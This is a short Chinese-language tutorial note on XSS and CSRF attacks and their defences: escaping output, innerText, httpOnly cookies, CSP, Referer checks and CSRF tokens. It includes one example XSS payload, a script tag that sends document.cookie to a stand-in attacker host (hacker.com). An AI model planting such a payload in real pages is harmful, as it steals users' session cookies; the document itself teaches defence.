网络攻击

·  阅读 79

xss攻击

  1. 什么是xss攻击?

举例:
假设我们要渲染一个用户评论到下面这个div中
<div></div>
我们会这样写
div.innerHTML = userComment
那么有什么潜在问题呢?
如果userComment是一段js代码的话,比如<script>$.get('http://hacker.com?cookie='+document.cookie)</script>
div.innerHTML就会执行这段代码,这是个恶意代码,就把用户的cookie给偷走了
复制代码
  1. 如何预防
1.不要使用innerHTML使用innerText
2. 如果一定要使用innerHTML那么就做一个字符过滤
把 '<'替换成'&lt''>'替换成'&gt''&'替换成 '&amp'' " ' 替换成'&quot'''' 替换成 '&apos'
代码: div.innerHTML = userComment.replace(/>/g,'&gt').replace(/</g,'&lt')....

如具有执行脚本能力的script, 具有显示广告和色情图片的img, 具有改变样式的link, style, 
具有内嵌页面的iframe, frame等元素节点。
对cookie设置httpOnly
过滤危险的属性节点。如事件, style, src, href等
3. 使用CSP
Content Security Prolicy
复制代码

CSRF攻击

1. 假设 用户在qq.com登录
2. 用户切换到hacker.com(恶意网站)
3. hacker.com发送一个qq.com/add_friends请求,让当前用户添加hacker为好友,
4. 用户就在不知不觉中添加了hacker为好友了
5. 用户没有想发这个请求,但是hacker伪造了用户发请求的假象
复制代码

如何避免?

1. 检查referer, 这里的referer应该是qq.com,一旦发现referer不是qq.com的话就拒绝这个请求。
2. 使用csrf_token来解决
复制代码
收藏成功!
已添加到「」, 点击更改